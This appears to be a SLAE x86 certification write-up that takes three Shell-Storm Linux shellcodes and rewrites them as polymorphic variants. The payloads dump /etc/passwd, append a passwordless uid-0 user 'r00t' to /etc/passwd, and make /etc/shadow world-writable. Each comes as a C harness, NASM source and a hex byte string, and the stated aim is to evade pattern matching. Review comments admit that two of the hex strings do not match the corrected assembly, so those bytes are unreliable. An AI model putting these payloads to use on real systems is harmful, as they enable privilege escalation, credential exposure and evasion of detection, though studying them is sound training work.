
SLAEx86 - Assignment 6

The sixth assignment for the SLAEx86 certification includes the following requirements:

  • Take up 3 shellcodes from Shell-Storm and create polymorphic versions of them to beat pattern matching
  • The polymorphic versions cannot be larger than 150% of the size of the existing shellcode
  • Bonus points for making it shorter in length than original

Shellcode 1:  /bin/cat /etc/passwd
Source: http://shell-storm.org/shellcode/files/shellcode-571.php
Size: 43 bytes

Original C harness with the shellcode bytes, followed by an uncommented first polymorphic variant (the original instruction sequence is the one shown in the C comments; the listing below already rewrites three of the string loads):

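#include <stdio.h>

/*
 * Shell-Storm #571, unchanged: execve("/bin/cat", argv, NULL) with
 * argv = { "/bin/cat", "/etc//passwd", NULL } on Linux x86 (int 0x80, eax = 11).
 * 43 bytes, no NUL bytes. Every string is pushed as little-endian dwords;
 * "/etc//passwd" carries a double slash so the path pads to exactly 3 dwords.
 * Declared const, so the bytes live in read-only (normally non-executable) data.
 * Fixes: the duplicated/garbled #include line and the "pu sh" typo; the
 * per-byte comments are now all in Intel syntax (the original mixed AT&T and Intel).
 */
const char shellcode[] =
    "\x31\xc0"                 /* xor  eax, eax                         */
    "\x99"                     /* cdq             ; edx = 0 (envp later) */
    "\x52"                     /* push edx        ; NUL for "/bin/cat"   */
    "\x68\x2f\x63\x61\x74"     /* push 0x7461632f ; "/cat"               */
    "\x68\x2f\x62\x69\x6e"     /* push 0x6e69622f ; "/bin"               */
    "\x89\xe3"                 /* mov  ebx, esp   ; ebx = "/bin/cat"     */
    "\x52"                     /* push edx        ; NUL for the path arg */
    "\x68\x73\x73\x77\x64"     /* push 0x64777373 ; "sswd"               */
    "\x68\x2f\x2f\x70\x61"     /* push 0x61702f2f ; "//pa"               */
    "\x68\x2f\x65\x74\x63"     /* push 0x6374652f ; "/etc"               */
    "\x89\xe1"                 /* mov  ecx, esp   ; ecx = "/etc//passwd" */
    "\xb0\x0b"                 /* mov  al, 0xb    ; eax = 11 = execve    */
    "\x52"                     /* push edx        ; argv[2] = NULL       */
    "\x51"                     /* push ecx        ; argv[1]              */
    "\x53"                     /* push ebx        ; argv[0]              */
    "\x89\xe1"                 /* mov  ecx, esp   ; ecx = argv           */
    "\xcd\x80";                /* int  0x80       ; execve(ebx, ecx, edx) */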

/*
 * Harness: transfer control into the shellcode bytes as if they were a function.
 * NOTE(review): shellcode is a const array, so it normally sits in a
 * non-executable segment; running this needs an executable-data build
 * (e.g. -z execstack / NX disabled) or an RWX copy — confirm for the target.
 * On success execve replaces the process and the return below never runs;
 * if the syscall fails, execution continues into whatever bytes follow the
 * array rather than returning here.
 */
int main(void)
{
    void (*payload)(void) = (void (*)(void)) shellcode;

    payload();
    return 0;
}

/*shellcode[]= "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64"  
          "\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";
*/

\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80


; First polymorphic variant of Shell-Storm #571 (uncommented draft).
; Same syscall as the original: execve("/bin/cat", ["/bin/cat", "/etc//passwd", NULL], NULL)
; on Linux x86 via int 0x80 (eax = 11). It differs from the original
; instruction sequence only in how three string dwords are produced: "/cat",
; "/bin" and "sswd" are built with add/sub 0x11111111 and stored through
; [esp-N] instead of being pushed as literals, which changes the byte pattern.
; Register roles: ebx = path, ecx = argv, edx = envp (NULL), eax = syscall number.
; NOTE(review): the stores to [esp-4]/[esp-8] land below esp before esp is
; adjusted; a signal delivered in between could overwrite them (no red zone
; on i386 Linux).
global _start
 
section .text
_start:

    xor eax,eax                   ; eax = 0
    cdq                           ; edx = 0 (sign of eax); used as envp/NUL below
    push edx                      ; NUL terminator for "/bin/cat"

    ; the original pushes these two dwords directly:
    ; push dword 0x7461632f       ; "/cat"
    ; push dword 0x6e69622f       ; "/bin"

    mov esi, 0x6350521e           ; 0x7461632f - 0x11111111
    add esi, 0x11111111           ; esi = 0x7461632f = "/cat"
    mov dword [esp-4], esi

    mov edi, 0x5d58511e           ; 0x6e69622f - 0x11111111
    add edi, 0x11111111           ; edi = 0x6e69622f = "/bin"
    mov dword [esp-8], edi
    sub esp, 8                    ; esp -> "/bin/cat\0"

    mov ebx,esp                   ; ebx = filename
 
    push edx                      ; NUL terminator for "/etc//passwd"

    ; original: push dword 0x64777373 ("sswd")

    mov esi, 0x75888484           ; 0x64777373 + 0x11111111
    sub esi, 0x11111111           ; esi = 0x64777373 = "sswd"
    mov dword [esp-4], esi
    sub esp, 4

    push dword 0x61702f2f         ; "//pa"
    push dword 0x6374652f         ; "/etc" -> esp = "/etc//passwd\0"

    mov ecx,esp                   ; ecx = "/etc//passwd"
 
    mov al,0xb                    ; eax = 11 = execve (upper bytes still 0)

    push edx                      ; argv[2] = NULL
    push ecx                      ; argv[1] = "/etc//passwd"
    push ebx                      ; argv[0] = "/bin/cat"
    mov ecx,esp                   ; ecx = argv; edx = envp = NULL
 
    int 0x80                      ; execve(ebx, ecx, edx); does not return on success

Polymorphic assembly code with comments:

; Filename - bin_cat.nasm
; Purpose - displays the contents of the /etc/passwd file using the /bin/cat command
; Source - http://shell-storm.org/shellcode/files/shellcode-571.php
;
; Polymorphic form of Shell-Storm #571: same syscall as the original,
; execve("/bin/cat", ["/bin/cat", "/etc//passwd", NULL], NULL) via int 0x80
; (eax = 11), but the string dwords are materialised with xchg / rol+inc and
; stored through [esp-N] instead of being pushed as literals.
; Register roles: ebx = path, ecx = argv, edx = envp (NULL), eax = syscall number.
; NOTE(review): stores to [esp-4..-12] sit below esp until the `sub esp`;
; a signal delivered in between could overwrite them (no red zone on i386).
; execve does not return on success; nothing handles a failed syscall.

global _start

section .text
_start:

    sub eax, eax                  ; eax = 0 (no NUL byte in the encoding)
    push eax                      ; NUL terminator for "/bin/cat"

    mov eax, 0x74612f63           ; "/cat" with its two low bytes swapped
    xchg al, ah                   ; eax = 0x7461632f = "/cat"
    mov dword [esp-4], eax        ; second half of the path

    mov edx, 0x6e692f62           ; "/bin" with its two low bytes swapped
    xchg dl, dh                   ; edx = 0x6e69622f = "/bin"
    mov dword [esp-8], edx        ; first half of the path

    sub esp, 8                    ; esp -> "/bin/cat\0"

    mov ebx, esp                  ; ebx = filename

    xor eax, eax                  ; eax = 0 again (it held "/cat")
    xor edx, edx                  ; edx = 0 = envp
 
    push eax                      ; NUL terminator for "/etc//passwd"
 
    mov esi, 0x323bb9b9           ; ("sswd" - 1) rotated right by 1
    rol esi, 1                    ; undo the rotate
    inc esi                       ; esi = 0x64777373 = "sswd"
    mov dword [esp-4], esi

    mov ebp, 0x30b81797           ; ("//pa" - 1) rotated right by 1
    rol ebp, 1
    inc ebp                       ; ebp = 0x61702f2f = "//pa"
    mov dword [esp-8], ebp

    mov edi, 0x31ba3297           ; ("/etc" - 1) rotated right by 1
    rol edi, 1
    inc edi                       ; edi = 0x6374652f = "/etc"
    mov dword [esp-12], edi

    sub esp, 12                   ; esp -> "/etc//passwd\0" (double slash pads to 3 dwords)

    mov ecx, esp                  ; ecx = "/etc//passwd"

    push edx                      ; argv[2] = NULL
    push ecx                      ; argv[1] = "/etc//passwd"
    push ebx                      ; argv[0] = "/bin/cat"

    mov ecx, esp                  ; ecx = argv

    mov al, 0xb                   ; eax = 11 = execve (upper bytes still 0)
    int 0x80                      ; execve(ebx, ecx, edx)

Original shellcode:

\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80

Polymorphic shellcode:

\x29\xc0\x50\xb8\x63\x2f\x61\x74\x86\xc4\x89\x44\x24\xfc\xba\x62\x2f\x69\x6e\x86\xd6\x89\x54\x24\xf8\x83\xec\x08\x89\xe3\x31\xc0\x31\xd2\x50\xbe\xb9\xb9\x3b\x32\xd1\xc6\x46\x89\x74\x24\xfc\xbd\x97\x17\xb8\x30\xd1\xc5\x45\x89\x6c\x24\xf8\xbf\x97\x32\xba\x31\xd1\xc7\x47\x89\x7c\x24\xf4\x83\xec\x0c\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80

Final size of polymorphic shellcode: 85 bytes (about 198% of the 43-byte original, so this version exceeds the 150% limit stated in the requirements).


Shellcode 2:  Add root user ‘r00t’ with no password to /etc/passwd
Source:  http://shell-storm.org/shellcode/files/shellcode-211.php 
Size: 69 bytes

Original code, shellcode and assembly code:

/* By Kris Katterjohn 11/14/2006
 *
 * 69 byte shellcode to add root user 'r00t' with no password to /etc/passwd
 *
 * for Linux/x86
 *
 *
 *
 * section .text
 *
 * global _start
 *
 * _start:
 *
 * ; open("/etc//passwd", O_WRONLY | O_APPEND)
 *
 * push byte 5
 * pop eax
 * xor ecx, ecx
 * push ecx
 * push 0x64777373
 * push 0x61702f2f
 * push 0x6374652f
 * mov ebx, esp
 * mov cx, 02001Q
 * int 0x80
 *
 * mov ebx, eax
 *
 * ; write(ebx, "r00t::0:0:::", 12)
 *
 * push byte 4
 * pop eax
 * xor edx, edx
 * push edx
 * push 0x3a3a3a30
 * push 0x3a303a3a
 * push 0x74303072
 * mov ecx, esp
 * push byte 12
 * pop edx
 * int 0x80
 *
 * ; close(ebx)
 *
 * push byte 6
 * pop eax
 * int 0x80
 *
 * ; exit()
 *
 * push byte 1
 * pop eax
 * int 0x80
 */

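/*
 * Harness for Shell-Storm #211 (bytes unchanged from the original):
 * open("/etc//passwd", O_WRONLY|O_APPEND); write(fd, "r00t::0:0:::", 12);
 * close(fd); exit(). The payload ends in exit(), so control never returns here.
 * NOTE(review): the array is a stack local, so the call only works with an
 * executable stack (e.g. -z execstack) — confirm for the target toolchain.
 * Fix: main() was declared without a return type (implicit int), which C99
 * removed from the language and recent GCC/Clang treat as an error.
 */
int main(void)
{
    char shellcode[] =
        "\x6a\x05\x58\x31\xc9\x51\x68\x73\x73\x77\x64\x68"
        "\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x66"
        "\xb9\x01\x04\xcd\x80\x89\xc3\x6a\x04\x58\x31\xd2"
        "\x52\x68\x30\x3a\x3a\x3a\x68\x3a\x3a\x30\x3a\x68"
        "\x72\x30\x30\x74\x89\xe1\x6a\x0c\x5a\xcd\x80\x6a"
        "\x06\x58\xcd\x80\x6a\x01\x58\xcd\x80";

    ((void (*)(void)) shellcode)();
    return 0;
}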

Polymorphic assembly code with comments:

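; Filename - r00tuser.nasm
; Purpose - appends "r00t::0:0:::" (uid 0, gid 0, empty password field) to /etc//passwd
; Source - http://shell-storm.org/shellcode/files/shellcode-211.php
;
; Syscalls (Linux x86, int 0x80): open(5) -> write(4) -> close(6) -> exit(1).
; Register roles: eax = syscall number / return value, ebx = path then fd,
; ecx = open flags then write buffer, edx = byte count.
; Fixes vs. the earlier draft (each changes the assembled bytes, so the hex
; string published for this listing — which contains `b2 12` and
; `66 ba e1 03 83 c2 20 89 d1` — must be re-assembled):
;   - the write length was `mov dl, 0x12` = 18, not 12, which also wrote the
;     four NUL bytes and the first two bytes of "/etc//passwd" into the file;
;     it is now 0xc.
;   - the open flags were assembled in dx with the upper 16 bits of edx never
;     cleared (`mov dx, 0x3e1` / `add edx, 0x20` / `mov ecx, edx`); they are
;     now built in ecx, which is known to be zero from `sub ecx, ecx`.
;   - three dead `xor esi/edi/ebp` before the record load are dropped
;     (each register is overwritten by the following mov).
; Expected size after these changes: 117 bytes (re-assemble to confirm).
; No error check after open(): if it fails (e.g. not root) the negative
; return value is used as the fd for write()/close(), which then fail too.
; NOTE(review): no newline is written, so the record is only a separate
; line if /etc/passwd already ends with one.
; NOTE(review): stores to [esp-4..-12] land below esp before the `sub esp`;
; a signal delivered in between could clobber them (no red zone on i386).

global _start

section .text
_start:

; open("/etc//passwd", O_WRONLY | O_APPEND)

    xor eax, eax                  ; eax = 0
    mov al, 0x5                   ; eax = 5 = open
    sub ecx, ecx                  ; ecx = 0 (reused below as the flags base)
    push ecx                      ; NUL terminator for the path

    mov esi, 0x73737764           ; "sswd" byte-reversed
    bswap esi                     ; esi = 0x64777373 = "sswd"
    mov dword [esp-4], esi

    mov edi, 0x2f2f7061           ; "//pa" byte-reversed
    bswap edi                     ; edi = 0x61702f2f = "//pa"
    mov dword [esp-8], edi

    mov ebp, 0x2f657463           ; "/etc" byte-reversed
    bswap ebp                     ; ebp = 0x6374652f = "/etc"
    mov dword [esp-12], ebp

    sub esp, 12                   ; esp -> "/etc//passwd\0"
    mov ebx, esp                  ; ebx = path

    mov cx, 0x3e1                 ; ecx = 0x401 - 0x20 (upper half already 0)
    add ecx, 0x20                 ; ecx = 0x401 = O_WRONLY (1) | O_APPEND (0x400)

    int 0x80                      ; eax = open(ebx, ecx) -> fd, or -errno

    mov ebx, eax                  ; ebx = fd
    xor edx, edx                  ; edx = 0

; write(fd, "r00t::0:0:::", 12)

    xor eax, eax                  ; eax = 0
    mov al, 0x4                   ; eax = 4 = write
    push edx                      ; NUL terminator for the record

    mov esi, 0x303a3a3a           ; "0:::" byte-reversed
    bswap esi                     ; esi = 0x3a3a3a30 = "0:::"
    mov dword [esp-4], esi

    mov edi, 0x3a3a303a           ; "::0:" byte-reversed
    bswap edi                     ; edi = 0x3a303a3a = "::0:"
    mov dword [esp-8], edi

    mov ebp, 0x72303074           ; "r00t" byte-reversed
    bswap ebp                     ; ebp = 0x74303072 = "r00t"
    mov dword [esp-12], ebp

    sub esp, 12                   ; esp -> "r00t::0:0:::\0"
    mov ecx, esp                  ; ecx = record buffer

    mov dl, 0xc                   ; edx = 12 = strlen("r00t::0:0:::")

    int 0x80                      ; write(ebx, ecx, edx)

; close(fd), then exit

    xor eax, eax                  ; eax = 0 (it held write's return value)
    mov al, 0x6                   ; eax = 6 = close

    int 0x80                      ; close(ebx)

    xor eax, eax                  ; eax = 0
    mov al, 0x1                   ; eax = 1 = exit

    int 0x80                      ; exit(ebx) -> status is the old fd value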

Original shellcode:

\x6a\x05\x58\x31\xc9\x51\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x01\x04\xcd\x80\x89\xc3\x6a\x04\x58\x31\xd2\x52\x68\x30\x3a\x3a\x3a\x68\x3a\x3a\x30\x3a\x68\x72\x30\x30\x74\x89\xe1\x6a\x0c\x5a\xcd\x80\x6a\x06\x58\xcd\x80\x6a\x01\x58\xcd\x80

Polymorphic shellcode:

\x31\xc0\xb0\x05\x29\xc9\x51\xbe\x64\x77\x73\x73\x0f\xce\x89\x74\x24\xfc\xbf\x61\x70\x2f\x2f\x0f\xcf\x89\x7c\x24\xf8\xbd\x63\x74\x65\x2f\x0f\xcd\x89\x6c\x24\xf4\x83\xec\x0c\x89\xe3\x66\xba\xe1\x03\x83\xc2\x20\x89\xd1\xcd\x80\x89\xc3\x31\xd2\x31\xc0\xb0\x04\x52\x31\xf6\x31\xff\x31\xed\xbe\x3a\x3a\x3a\x30\x0f\xce\x89\x74\x24\xfc\xbf\x3a\x30\x3a\x3a\x0f\xcf\x89\x7c\x24\xf8\xbd\x74\x30\x30\x72\x0f\xcd\x89\x6c\x24\xf4\x83\xec\x0c\x89\xe1\xb2\x12\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x31\xc0\xb0\x01\xcd\x80

Final size of polymorphic shellcode: 125 bytes (about 181% of the 69-byte original, so this version also exceeds the 150% limit stated in the requirements).

Executing the new shellcode adds the new ‘r00t’ entry (uid 0, gid 0, empty password field) to /etc/passwd:


Shellcode 3:  chmod /etc/shadow to 0666
Source:  http://shell-storm.org/shellcode/files/shellcode-210.php 
Size: 36 bytes

Original code, shellcode and assembly code:

/* By Kris Katterjohn 8/29/2006
 *
 * 36 byte shellcode to chmod("/etc/shadow", 0666) and exit for Linux/x86
 *
 * To remove exit(): Remove the last 5 bytes (0x6a - 0x80)
 *
 *
 *
 * section .text
 *
 * global _start
 *
 * _start:
 * xor edx, edx
 *
 * push byte 15
 * pop eax
 * push edx
 * push byte 0x77
 * push word 0x6f64
 * push 0x6168732f
 * push 0x6374652f
 * mov ebx, esp
 * push word 0666Q
 * pop ecx
 * int 0x80
 *
 * push byte 1
 * pop eax
 * int 0x80
 */

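/*
 * Harness for Shell-Storm #210 (bytes unchanged from the original):
 * chmod("/etc//shadow", 0666) followed by exit(), so control never returns here.
 * NOTE(review): the array is a stack local, so the call only works with an
 * executable stack (e.g. -z execstack) — confirm for the target toolchain.
 * Fix: main() was declared without a return type (implicit int), which C99
 * removed from the language and recent GCC/Clang treat as an error.
 */
int main(void)
{
    char shellcode[] =
        "\x31\xd2\x6a\x0f\x58\x52\x6a\x77\x66\x68\x64\x6f\x68"
        "\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\x68"
        "\xb6\x01\x59\xcd\x80\x6a\x01\x58\xcd\x80";

    ((void (*)(void)) shellcode)();
    return 0;
}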

Polymorphic assembly code with comments:

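; Filename - shadow.nasm
; Purpose - chmod("/etc//shadow", 0666) on Linux x86 via int 0x80 (eax = 15)
; Source - http://shell-storm.org/shellcode/files/shellcode-210.php
;
; Register roles: eax = syscall number, ebx = path, ecx = mode.
; Fix vs. the earlier draft: the mode was set with `push word 0x1b6` followed
; by `mov ecx, esp`, so ecx held the address of the pushed word rather than
; 0666, and the mode actually applied depended on that stack address (the hex
; string published for this listing, ...66 68 b6 01 89 e1..., encodes that
; draft and must be re-assembled). The mode is now loaded into ecx directly;
; the replacement is also 6 bytes, so the total stays at 54 bytes.
; Unlike the original there is no exit() afterwards: execution continues
; into whatever bytes follow the payload.
; NOTE(review): the dword stores go to [esp-4..-12] before esp is moved;
; a signal delivered in between could overwrite them (no red zone on i386).

global _start

section .text
_start:

    sub eax, eax                       ; eax = 0 (no NUL byte in the encoding)
    push eax                           ; NUL terminator for the path

    mov esi, 0x776f6411                ; 0x776f6461 "adow" - 80
    mov edi, 0x68732f5f                ; 0x68732f2f "//sh" + 48
    mov ebp, 0x63746544                ; 0x6374652f "/etc" + 21

    add esi, 80                        ; esi = "adow"
    sub edi, 48                        ; edi = "//sh"
    sub ebp, 21                        ; ebp = "/etc"

    mov dword [esp-4], esi
    mov dword [esp-8], edi
    mov dword [esp-12], ebp

    sub esp, 12                        ; esp -> "/etc//shadow\0"

    mov ebx, esp                       ; ebx = path

    xor ecx, ecx                       ; clear the upper half before the 16-bit load
    mov cx, 0x1b6                      ; ecx = 0666 (octal) = 0x1b6

    mov al, 0xf                        ; eax = 15 = chmod (upper bytes still 0)
    int 0x80                           ; chmod(ebx, ecx); return value not checked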

Original shellcode:

\x31\xd2\x6a\x0f\x58\x52\x6a\x77\x66\x68\x64\x6f\x68\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\x68\xb6\x01\x59\xcd\x80\x6a\x01\x58\xcd\x80

Polymorphic shellcode:

\x29\xc0\x50\xbe\x11\x64\x6f\x77\xbf\x5f\x2f\x73\x68\xbd\x44\x65\x74\x63\x83\xc6\x50\x83\xef\x30\x83\xed\x15\x89\x74\x24\xfc\x89\x7c\x24\xf8\x89\x6c\x24\xf4\x83\xec\x0c\x89\xe3\x66\x68\xb6\x01\x89\xe1\xb0\x0f\xcd\x80

Final size of polymorphic shellcode: 54 bytes (exactly 150% of the 36-byte original, i.e. at the limit; note that, unlike the original, this version does not end with an exit() syscall).

After executing the shellcode and verifying that the permissions of /etc/shadow had changed, I was able to open the file from a regular user account:
